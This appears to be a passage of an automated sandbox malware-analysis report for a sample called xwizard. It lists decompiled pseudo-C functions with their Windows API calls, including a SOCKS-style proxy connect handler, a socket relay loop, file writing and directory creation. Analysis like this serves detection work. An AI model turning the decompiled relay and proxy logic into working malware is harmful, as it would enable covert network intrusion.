					_t90 =  &_v288;
					_v576 = _t57 + 1;
					goto L4;
					do {
						do {
							do {
								L4:
								_t89 = _a8;
								_t59 = _a4;
								_v556 = 0x1e;
								_v552 = 0;
								_v548 = 1;
								_v544 = _t89;
								if(_t89 != _t59) {
									_v540 = _t59;
									_v548 = 2;
								}
								_v284 = _t89;
								_v288 = 1;
								if(_t89 != _t59) {
									_v280 = _t59;
									_v288 = 2;
								}
								_t92 =  &_v548;
								_v608 = _t90;
								_v612 = 0;
								_v604 =  &_v556;
								_t61 = _v576;
								_v616 = _t92;
								_v620 = _t61;
								L0041F904();
								_t93 = _t93 - 0x14;
								_t99 = _t61;
							} while (_t99 == 0);
							if(_t99 >= 0) {
								_t62 = _v16;
								_v636 = _t90;
								 *_t93 = _t62;
								L0041F94C();
								_push(_t91);
								_push(_t91);
								if(_t62 != 0) {
									goto L8;
								}
								_t69 = _v20;
								_v644 = _t90;
								 *_t93 = _t69;
								L0041F94C();
								_push(_t84);
								if(_t69 != 0) {
									goto L8;
								}
								_t70 = _v28;
								_v652 = _t92;
								_v656 = _t70;
								L0041F94C();
								_push(_t87);
								_push(_t87);
								if(_t70 != 0) {
									_v652 = 0;
									_v656 = 0x4000;
									_v660 = _v604;
									_t72 = _v36;
									 *_t93 = _t72;
									L0041F90C();
									_t93 = _t93 - 0x10;
									_t85 = _t72;
									if(_t72 <= 0) {
										goto L8;
									}
									_t91 = 0;
									do {
										_v668 = 0;
										_v672 = _t85;
										_v676 = _v620 + _t91;
										_t75 = _v56;
										 *_t93 = _t75;
										L0041F8FC();
										_t93 = _t93 - 0x10;
										if(_t75 != 0xffffffff) {
											_t85 = _t85 - _t75;
											_t91 = _t91 + _t75;
											goto L20;
										}
										E004051B0();
										if(_t75 != 0x2733) {
											break;
										}
										E00407EF4(1);
										L20:
									} while (_t91 < _t85);
									if(_t85 == 0) {
										goto L12;
									}
									goto L8;
								}
								goto L12;
							}
							L8:
							 *_t93 =  &_v588;
							E00407F59();
							 *_t93 =  &_v24;
							E00405999(_t89);
							 *_t93 =  &_v20;
							return E00405999(_t89);
							L12:
							_t76 = _v72;
							_v692 = _t92;
							_v696 = _t76;
							L0041F94C();
							_push(_t89);
							_push(_t89);
						} while (_t76 == 0);
						_v692 = 0;
						_v696 = 0x4000;
						_v700 = _v644;
						_t78 = _v80;
						 *_t93 = _t78;
						L0041F90C();
						_t93 = _t93 - 0x10;
						_t86 = _t78;
						if(_t78 <= 0) {
							goto L8;
						}
						_t91 = 0;
						do {
							_v708 = 0;
							_v712 = _t86;
							_v716 = _v660 + _t91;
							_t81 = _v92;
							 *_t93 = _t81;
							L0041F8FC();
							_t93 = _t93 - 0x10;
							if(_t81 != 0xffffffff) {
								_t86 = _t86 - _t81;
								_t91 = _t91 + _t81;
								goto L29;
							}
							E004051B0();
							if(_t81 != 0x2733) {
								goto L30;
							}
							 *_t93 = 1;
							E00407EF4();
							L29:
						} while (_t86 > _t91);
						L30:
					} while (_t86 == 0);
					goto L8;
				}
				return _t56;
			}

0x00411770
0x00411774
0x00411781
0x00411788
0x0041178c
0x00411792
0x00411799
0x004117a2
0x004117a4
0x004117a4
0x004117a7
0x004117ae
0x004117ae
0x004117b2
0x004117b2
0x004117b2
0x004117b2
0x004117b2
0x004117b9
0x004117c0
0x004117c8
0x004117d0
0x004117da
0x004117de
0x004119ef
0x004119f3
0x004119f3
0x004117e6
0x004117ed
0x004117f8
0x00411a00
0x00411a07
0x00411a07
0x00411802
0x00411806
0x0041180a
0x00411812
0x00411816
0x0041181a
0x0041181e
0x00411821
0x00411826
0x00411829
0x00411829
0x0041182d
0x0041185e
0x00411865
0x00411869
0x0041186c
0x00411873
0x00411874
0x00411875
0x00000000
0x00000000
0x00411877
0x0041187e
0x00411882
0x00411885
0x0041188d
0x0041188e
0x00000000
0x00000000
0x00411890
0x00411897
0x0041189b
0x0041189e
0x004118a5
0x004118a6
0x004118a7
0x004118cf
0x004118d7
0x004118df
0x004118e3
0x004118ea
0x004118ed
0x004118f2
0x004118f7
0x004118f9
0x00000000
0x00000000
0x004118ff
0x00411901
0x00411905
0x0041190d
0x00411913
0x00411917
0x0041191e
0x00411921
0x00411926
0x0041192c
0x00411948
0x0041194a
0x00000000
0x0041194a
0x0041192e
0x00411938
0x00000000
0x00000000
0x00411941
0x0041194c
0x0041194c
0x00411952
0x00000000
0x00000000
0x00000000
0x00411958
0x00000000
0x004118a7
0x0041182f
0x00411833
0x00411836
0x00411842
0x00411845
0x00411851
0x00000000
0x004118a9
0x004118a9
0x004118b0
0x004118b4
0x004118b7
0x004118be
0x004118bf
0x004118bf
0x00411961
0x00411969
0x00411971
0x00411975
0x0041197c
0x0041197f
0x00411984
0x00411989
0x0041198b
0x00000000
0x00000000
0x00411991
0x00411993
0x00411997
0x0041199f
0x004119a5
0x004119a9
0x004119b0
0x004119b3
0x004119b8
0x004119be
0x004119da
0x004119dc
0x00000000
0x004119dc
0x004119c0
0x004119ca
0x00000000
0x00000000
0x004119cc
0x004119d3
0x004119de
0x004119de
0x004119e2
0x004119e2
0x00000000
0x004119ea
0x00411a21

APIs

malloc.MSVCRT ref: 00411781
select.WS2_32 ref: 00411821
__WSAFDIsSet.WS2_32 ref: 0041186C
__WSAFDIsSet.WS2_32 ref: 00411885
__WSAFDIsSet.WS2_32 ref: 0041189E
__WSAFDIsSet.WS2_32 ref: 004118B7
recv.WS2_32 ref: 004118ED
send.WS2_32 ref: 00411921
recv.WS2_32 ref: 0041197F
send.WS2_32 ref: 004119B3

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: recvsend$mallocselect
String ID:
API String ID: 2752384660-0
Opcode ID: a64bc3bca2e94daf9bac5f63325dc41034b0de72eb9cb62361ac1a124de08245
Instruction ID: 396cab881292c67bc80472d702024345634477e2cb390eb29da05618a31f840e
Opcode Fuzzy Hash: a64bc3bca2e94daf9bac5f63325dc41034b0de72eb9cb62361ac1a124de08245
Instruction Fuzzy Hash: 5A61FCB05197419FD720BF79C5847ABBBE4AF84314F10892FE998C3351E77898858B47

Uniqueness

Uniqueness Score: -1.00%

Function 00413EB3, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00413F0A
_wfopen.MSVCRT ref: 00413F1D
fgetpos.MSVCRT ref: 00413F62
MultiByteToWideChar.KERNEL32 ref: 004141E8
_wfopen.MSVCRT ref: 004141FB
_wfopen.MSVCRT ref: 00413F92

Part of subcall function 00407FC3: fgetpos.MSVCRT ref: 00407FE9

fread.MSVCRT ref: 00414339

Strings

EB, xrefs: 00413F12

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _wfopen$ByteCharMultiWidefgetpos$fread
String ID: EB
API String ID: 938800225-4058845024
Opcode ID: 950e416187ae905cf82d7dafeef771dc36a792c2880a9897fab731ecdff24896
Instruction ID: fdcfd7fcdd99f777d3a34adf36677ce69dcc47347dc1f65e5ed97d3c26df3997
Opcode Fuzzy Hash: 950e416187ae905cf82d7dafeef771dc36a792c2880a9897fab731ecdff24896
Instruction Fuzzy Hash: 75D1E7B45087459FC310EF65C1886AABBE0BF89308F15C97EE8D897352D7789885CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0040970C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132filetimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00409733
CloseHandle.KERNEL32 ref: 0040979A
CloseHandle.KERNEL32 ref: 004097B3
MultiByteToWideChar.KERNEL32 ref: 0040982A
CreateFileW.KERNEL32 ref: 00409865
SetFilePointer.KERNEL32 ref: 004098A1
WriteFile.KERNEL32 ref: 00409936

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Strings

1B, xrefs: 004098B2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$ByteCharCreateLocalMultiPointerTimeWideWrite_vsnprintf
String ID: 1B
API String ID: 1679277924-3133059986
Opcode ID: 4e2e8c59022566be6e83790a85539b938eb59b7fa42426b377093483d846f68c
Instruction ID: e376d887f57f93dc865b5eaaf6567e86db3f04f64e7ab8cebec23d02cc14b5b1
Opcode Fuzzy Hash: 4e2e8c59022566be6e83790a85539b938eb59b7fa42426b377093483d846f68c
Instruction Fuzzy Hash: E9512DB05083009BC310EF26D54426BBBF0BB85718F518A2EF4D497392D7BD9989CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00409E61, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407F7A: LoadLibraryA.KERNEL32 ref: 00407F84

Part of subcall function 00407F8E: GetProcAddress.KERNEL32 ref: 00407FA0

RegisterClassExW.USER32 ref: 00409F29

Strings

0, xrefs: 00409EEF
0, xrefs: 00409F0A
ssdaClass, xrefs: 00409E69

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: AddressClassLibraryLoadProcRegister
String ID: 0$0$ssdaClass
API String ID: 3006457887-3236872048
Opcode ID: eed60d624a5036191c5a01f9f44c180ff77991b3a128f902be9f0c859de88d18
Instruction ID: dc59c3b724a470855dcc4065ae2b59d1d9b3c777af613543eb6a0d926dcb9681
Opcode Fuzzy Hash: eed60d624a5036191c5a01f9f44c180ff77991b3a128f902be9f0c859de88d18
Instruction Fuzzy Hash: 863108B05183019AE310BF25D55531FBAE0BF84348F41892EF4C4AB292D7BD8949CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040C197, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040C1B8

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

getenv.MSVCRT ref: 0040C1F6

Part of subcall function 00407F59: free.MSVCRT ref: 00407F6A

fopen.MSVCRT ref: 0040C22C
malloc.MSVCRT ref: 0040C259
fread.MSVCRT ref: 0040C27D
fclose.MSVCRT ref: 0040C2B0
fclose.MSVCRT ref: 0040C2CA

Strings

k6B, xrefs: 0040C294

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosegetenv$AttributesByteCharFileMultiWide_vsnprintffopenfreadfreemalloc
String ID: k6B
API String ID: 164930318-2852998170
Opcode ID: 6f265e7767bb09b1958d82cec7efb8e1d7851cee31c0bd1cca4d9617d6bfff10
Instruction ID: 923c2ccaee423b8f51ada5992f51b5999be8c953822dc98e8fb21a0b7bf81a7a
Opcode Fuzzy Hash: 6f265e7767bb09b1958d82cec7efb8e1d7851cee31c0bd1cca4d9617d6bfff10
Instruction Fuzzy Hash: 113118B05087019ED710BFA6D58526EFBE4AF94358F41883EE4D89B392D77CC4858B4A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F151, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 187
stringCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0041F151() {
				int _t74;
				signed int _t86;
				intOrPtr _t108;
				signed int _t116;
				intOrPtr* _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				void* _t137;
				void _t139;
				void* _t151;
				void* _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t157;
				void* _t158;
				void* _t159;
				signed int* _t161;

				_t158 = _t157 - 0x5cc;
				_t152 = _t158 + 0x71;
				_t155 =  *(_t158 + 0x5e0);
				_t74 = memset(_t152, 0, 0x105 << 0);
				_t159 = _t158 + 0xc;
				_t137 = _t159 + 0x20;
				 *((intOrPtr*)(_t159 + 0x14)) = 0;
				memset(_t158 + 0x176, _t74, 0x105 << 0);
				memset(_t137, 0, 0x14 << 2);
				_t161 = _t159 + 0x18;
				if(_t137 == 0 || _t155 == 0 || _t161[0x179] == 0) {
					L40:
					_t122 = _t121 | 0xffffffff;
				} else {
					asm("repne scasb");
					_t121 =  !0xffffffff;
					_t161[4] = 0xbadbac;
					if(0 > 0x104) {
						goto L40;
					} else {
						_t161[2] = 0;
						_t161[1] = _t155;
						 *_t161 = _t137;
						if(E0041C5A7() == 0) {
							goto L40;
						} else {
							memset( &(_t161[0xe0]), _t161[5], 0x90 << 2);
							_t161 =  &(_t161[3]);
							 *_t161 = _t152;
							_t161[1] = _t161[0x179];
							strcpy(??, ??);
							_t86 = _t161[0x2eb707];
							if(_t86 != 0x2f && _t86 != 0x5c) {
								_t161[0x2eb707] = 0x5c;
								_t161[4] =  !0xffffffff;
							}
							_t123 =  &(_t161[0x1c]);
							_t156 = 0;
							_t161[5] = _t161[0xc];
							_t161[7] = _t161[4] + _t123;
							while(_t156 != _t161[5]) {
								_t161[1] = _t156;
								_t161[2] =  &(_t161[0xe0]);
								 *_t161 =  &(_t161[8]);
								if(E0041B06A() != 0) {
									_t153 = 0;
									_t161[2] = 0x104 - _t161[4];
									_t161[1] =  &(_t161[0xef]);
									 *_t161 = _t161[7];
									strncpy(??, ??, ??);
									_t139 = _t161[0x1c];
									if((_t139 & 0xffffffdf) - 0x41 <= 0x19) {
										_t153 = 0 | _t161[0x1c] == 0x0000003a;
									}
									memset( &(_t161[0x9e]), 0, 0x105 << 0);
									_t161 =  &(_t161[3]);
									_t151 = 0;
									if(_t153 != 0) {
										_t161[0x9e] = _t139;
										_t151 = 2;
										_t161[0x9f] = _t161[0x1c];
									}
									_t161[6] = (_t153 ^ 0x00000001) & 0x00000001;
									while(1) {
										_t108 =  *((intOrPtr*)(_t123 + _t151));
										if(_t151 > 0x103 || _t108 == 0) {
											break;
										}
										if(_t108 == 0x2f || _t108 == 0x5c) {
											if(_t161[6] == 0 || _t151 <= 0) {
												if(_t151 <= 2 || _t153 == 0) {
													goto L21;
												} else {
													goto L26;
												}
											} else {
												L26:
												_t116 =  &(_t161[0x9e]);
												 *_t161 = _t116;
												L0041F7C4();
												_t117 = _t116 + 1;
												if(_t117 != 0) {
													goto L21;
												} else {
													L0041F7D4();
													if( *_t117 == 0x11) {
														goto L21;
													} else {
														goto L11;
													}
												}
											}
										} else {
											L21:
											_t151 = _t151 + 1;
											 *((char*)(_t161 + _t151 + 0x27a)) =  *((intOrPtr*)(_t123 + _t151 - 1));
											continue;
										}
										goto L39;
									}
									if((_t161[0xe2] & 0xef) != 3 || (_t161[0xeb] & 0x00000020) == 0) {
										_t154 =  &(_t161[8]);
										_t161[1] = _t156;
										 *_t161 = _t154;
										if(E0041B020() != 0) {
											goto L31;
										} else {
											_t161[3] = 0;
											_t161[2] = _t123;
											_t161[1] = _t156;
											 *_t161 = _t154;
											if(E0041C368() != 0) {
												goto L31;
											} else {
												goto L11;
											}
										}
									} else {
										L31:
										if(_t161[0x17a] != 0) {
											 *_t161 = _t123;
											_t161[1] = _t161[0x17b];
											if(_t161[0x17a]() < 0) {
												goto L11;
											} else {
												goto L37;
											}
										} else {
											L37:
											_t156 = _t156 + 1;
											continue;
										}
									}
								} else {
									L11:
									_t122 = _t123 | 0xffffffff;
								}
								L39:
								 *_t161 =  &(_t161[8]);
								if(E0041C416() == 0) {
									goto L40;
								}
								goto L41;
							}
							_t122 = 0;
							goto L39;
						}
					}
				}
				L41:
				return _t122;
			}

0x0041f15c
0x0041f162
0x0041f16d
0x0041f176
0x0041f176
0x0041f17a
0x0041f17e
0x0041f187
0x0041f194
0x0041f194
0x0041f196
0x0041f3df
0x0041f3df
0x0041f1b5
0x0041f1bf
0x0041f1cc
0x0041f1ce
0x0041f1d2
0x00000000
0x0041f1d8
0x0041f1d8
0x0041f1e0
0x0041f1e4
0x0041f1ee
0x00000000
0x0041f1f4
0x0041f206
0x0041f206
0x0041f20f
0x0041f212
0x0041f216
0x0041f21b
0x0041f221
0x0041f227
0x0041f22c
0x0041f22c
0x0041f234
0x0041f238
0x0041f23a
0x0041f244
0x0041f248
0x0041f259
0x0041f25d
0x0041f265
0x0041f26f
0x0041f282
0x0041f284
0x0041f28f
0x0041f297
0x0041f29a
0x0041f29f
0x0041f2ad
0x0041f2b9
0x0041f2b9
0x0041f2c9
0x0041f2c9
0x0041f2cb
0x0041f2cf
0x0041f2d5
0x0041f2dc
0x0041f2e1
0x0041f2e1
0x0041f2f0
0x0041f2f4
0x0041f2fa
0x0041f2fd
0x00000000
0x00000000
0x0041f305
0x0041f31e
0x0041f327
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f32d
0x0041f32d
0x0041f32d
0x0041f334
0x0041f337
0x0041f33c
0x0041f33d
0x00000000
0x0041f33f
0x0041f33f
0x0041f347
0x00000000
0x0041f349
0x00000000
0x0041f349
0x0041f347
0x0041f33d
0x0041f30b
0x0041f30b
0x0041f30b
0x0041f310
0x00000000
0x0041f310
0x00000000
0x0041f305
0x0041f35d
0x0041f375
0x0041f379
0x0041f37d
0x0041f387
0x00000000
0x0041f389
0x0041f389
0x0041f391
0x0041f395
0x0041f399
0x0041f3a3
0x00000000
0x0041f3a5
0x00000000
0x0041f3a5
0x0041f3a3
0x0041f369
0x0041f369
0x0041f371
0x0041f3b1
0x0041f3b4
0x0041f3c1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f373
0x0041f3c7
0x0041f3c7
0x00000000
0x0041f3c7
0x0041f371
0x0041f271
0x0041f271
0x0041f271
0x0041f271
0x0041f3cf
0x0041f3d3
0x0041f3dd
0x00000000
0x00000000
0x00000000
0x0041f3dd
0x0041f3cd
0x00000000
0x0041f3cd
0x0041f1ee
0x0041f1d2
0x0041f3e2
0x0041f3ee

APIs

Part of subcall function 0041C5A7: fopen.MSVCRT ref: 0041C5C3
Part of subcall function 0041C5A7: fseek.MSVCRT ref: 0041C5E1
Part of subcall function 0041C5A7: ftell.MSVCRT ref: 0041C5ED
Part of subcall function 0041C5A7: fclose.MSVCRT ref: 0041C604

strcpy.MSVCRT ref: 0041F216
strncpy.MSVCRT ref: 0041F29A
_mkdir.MSVCRT ref: 0041F337
_errno.MSVCRT ref: 0041F33F

Strings

\, xrefs: 0041F227
:, xrefs: 0041F2B1
, xrefs: 0041F35F

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _errno_mkdirfclosefopenfseekftellstrcpystrncpy
String ID: $:$\
API String ID: 268051615-2457500751
Opcode ID: 9526ac459c02bb7793610bcab494c40ffb002977be289f00c765dc40185c480f
Instruction ID: 79c026138aa9a439cba8819bc206cad1fae7c9babfb4a3138d3d5cf70f9326d1
Opcode Fuzzy Hash: 9526ac459c02bb7793610bcab494c40ffb002977be289f00c765dc40185c480f
Instruction Fuzzy Hash: 56616E7550C7898AD7249F39C4803EFBBE1AF84304F54493FE8E883341D779898A8B4A

Uniqueness

Uniqueness Score: -1.00%

Function 00411A5C, Relevance: 12.1, APIs: 8, Instructions: 148
networkCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00411A5C(void* __ecx, signed short* _a4) {
				signed short _v268;
				signed short _v272;
				char _v572;
				char _v586;
				signed short _v676;
				char _v680;
				intOrPtr _v688;
				intOrPtr _v692;
				char _v716;
				signed short _v720;
				signed short _v724;
				char _v728;
				char _v730;
				signed short _v732;
				char _v736;
				signed short _v744;
				signed int _v748;
				signed short _v752;
				char* _v756;
				signed short _v764;
				signed short _v768;
				signed short _v772;
				signed short _v780;
				signed short _v784;
				signed short _v788;
				signed short _v792;
				intOrPtr _v800;
				signed short _v804;
				signed short _v816;
				signed short _t64;
				signed short _t65;
				signed short _t71;
				signed int _t72;
				signed short _t73;
				signed short _t75;
				signed short* _t91;
				char* _t93;
				signed short _t96;
				signed int _t97;
				signed short _t98;
				signed short* _t100;
				signed short* _t101;
				signed short* _t102;
				signed short* _t103;

				_t92 = __ecx;
				_t91 = _a4;
				_t93 =  &_v680;
				_t97 =  &_v272;
				_v692 = 0xffffffff;
				_v688 = 0xffffffff;
				_v680 = 5;
				_v676 = 0;
				_t64 =  *_t91;
				_v716 = _t93;
				_v720 = 0;
				_v724 = 0;
				_v728 = _t97;
				_v272 = 1;
				_v268 = _t64;
				_t65 = _t64 + 1;
				_v732 = _t65;
				L0041F904();
				_t100 =  &_v720 - 0x14;
				if(_t65 > 0) {
					_v748 = _t97;
					_t65 =  *_t91;
					_v752 = _t65;
					L0041F94C();
					_push(__ecx);
					_push(__ecx);
					if(_t65 != 0) {
						_v748 = 0;
						_v752 = 4;
						_v756 =  &_v716;
						_t65 =  *_t91;
						 *_t100 = _t65;
						L0041F90C();
						_t101 = _t100 - 0x10;
						if(_t65 > 0) {
							_t65 =  *_t91;
							_t98 =  &_v572;
							_v764 = 0;
							if(_v732 != 1) {
								_v768 = 0x100;
								_v772 = _t98;
								 *_t101 = _t65;
								L0041F90C();
								_t102 = _t101 - 0x10;
								__eflags = _t65;
								if(_t65 > 0) {
									_t96 =  &_v716;
									_v784 = 0x80;
									_v788 = _t98;
									_v744 = 0;
									_v792 = _t96;
									E00412AA3( &_v744, _t98 + E00412548() + 1, 2);
									_t71 = _v744 & 0x0000ffff;
									_v792 = _t71;
									L0041F914();
									_push(_t93);
									_t72 = _t71 & 0x0000ffff;
									_v792 = _t72;
									 *_t102 = _t96;
									_v748 = _t72;
									_v788 =  &_v736;
									_t73 = E004051B5(_t92,  &_v736);
									__eflags = _t73;
									if(__eflags != 0) {
										goto L9;
									}
									_v792 = 1;
									goto L11;
								}
							} else {
								_v768 = 6;
								_v772 = _t98;
								 *_t101 = _t65;
								L0041F90C();
								_t102 = _t101 - 0x10;
								if(_t65 == 6) {
									_v784 = 2;
									_v788 = _t98;
									_v732 = 2;
									_v792 =  &_v730;
									E00412AA3();
									E00412AA3( &_v728,  &_v586, 4);
									_t73 = E004129E4( &_v724, 0, 8);
									L9:
									_v788 = 6;
									_v792 = 1;
									 *_t102 = 2;
									L0041F8E4();
									_t102 = _t102 - 0xc;
									_t109 = _t73 - 0xffffffff;
									_v768 = _t73;
									if(_t73 != 0xffffffff) {
										_v800 = 0x10;
										 *_t102 = _t73;
										_v804 =  &_v748;
										L0041F93C();
										_t103 = _t102 - 0xc;
										__eflags = _t73 + 1;
										_t75 =  *_t91;
										if(__eflags == 0) {
											_v816 = 2;
											 *_t103 = _t75;
											E00411A22(__eflags);
											 *_t103 =  &_v780;
											return E00405999( &_v748);
										}
										_v816 = 3;
										 *_t103 = _t75;
										E00411A22(__eflags);
										_v816 =  *_t91;
										 *_t103 = _v780;
										return E00411770(_t92);
									}
									_v804 = 2;
									L11:
									 *_t102 =  *_t91;
									return E00411A22(_t109);
								}
							}
						}
					}
				}
				return _t65;
			}

0x00411a5c
0x00411a65
0x00411a6c
0x00411a70
0x00411a77
0x00411a7f
0x00411a87
0x00411a8f
0x00411a97
0x00411a99
0x00411a9d
0x00411aa5
0x00411aad
0x00411ab1
0x00411abc
0x00411ac3
0x00411ac4
0x00411ac7
0x00411acc
0x00411ad1
0x00411ad7
0x00411adb
0x00411add
0x00411ae0
0x00411ae7
0x00411ae8
0x00411ae9
0x00411af3
0x00411afb
0x00411b03
0x00411b07
0x00411b09
0x00411b0c
0x00411b11
0x00411b16
0x00411b21
0x00411b23
0x00411b2a
0x00411b32
0x00411bb3
0x00411bbb
0x00411bbf
0x00411bc2
0x00411bc7
0x00411bca
0x00411bcc
0x00411bd2
0x00411bd6
0x00411bde
0x00411be2
0x00411bea
0x00411c09
0x00411c0e
0x00411c13
0x00411c16
0x00411c1b
0x00411c1c
0x00411c23
0x00411c27
0x00411c2a
0x00411c2e
0x00411c32
0x00411c37
0x00411c39
0x00000000
0x00000000
0x00411c3b
0x00000000
0x00411c3b
0x00411b34
0x00411b34
0x00411b3c
0x00411b40
0x00411b43
0x00411b48
0x00411b4e
0x00411b58
0x00411b60
0x00411b64
0x00411b6b
0x00411b6e
0x00411b8d
0x00411ba9
0x00411c45
0x00411c45
0x00411c4d
0x00411c55
0x00411c5c
0x00411c61
0x00411c64
0x00411c67
0x00411c6b
0x00411c85
0x00411c8d
0x00411c90
0x00411c94
0x00411c99
0x00411c9c
0x00411c9d
0x00411c9f
0x00411cc5
0x00411ccd
0x00411cd0
0x00411cd9
0x00000000
0x00411cdc
0x00411ca1
0x00411ca9
0x00411cac
0x00411cb3
0x00411cbb
0x00000000
0x00411cbe
0x00411c6d
0x00411c75
0x00411c77
0x00000000
0x00411c7a
0x00411b4e
0x00411b32
0x00411b16
0x00411ae9
0x00411cea

APIs

select.WS2_32 ref: 00411AC7
__WSAFDIsSet.WS2_32 ref: 00411AE0
recv.WS2_32 ref: 00411B0C
recv.WS2_32 ref: 00411B43
recv.WS2_32 ref: 00411BC2
htons.WS2_32 ref: 00411C16
socket.WS2_32 ref: 00411C5C
connect.WS2_32 ref: 00411C94

Part of subcall function 00411A22: send.WS2_32 ref: 00411A4C

Part of subcall function 00405999: shutdown.WS2_32 ref: 004059B6
Part of subcall function 00405999: closesocket.WS2_32(00000000), ref: 004059C2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: recv$closesocketconnecthtonsselectsendshutdownsocket
String ID:
API String ID: 1430705073-0
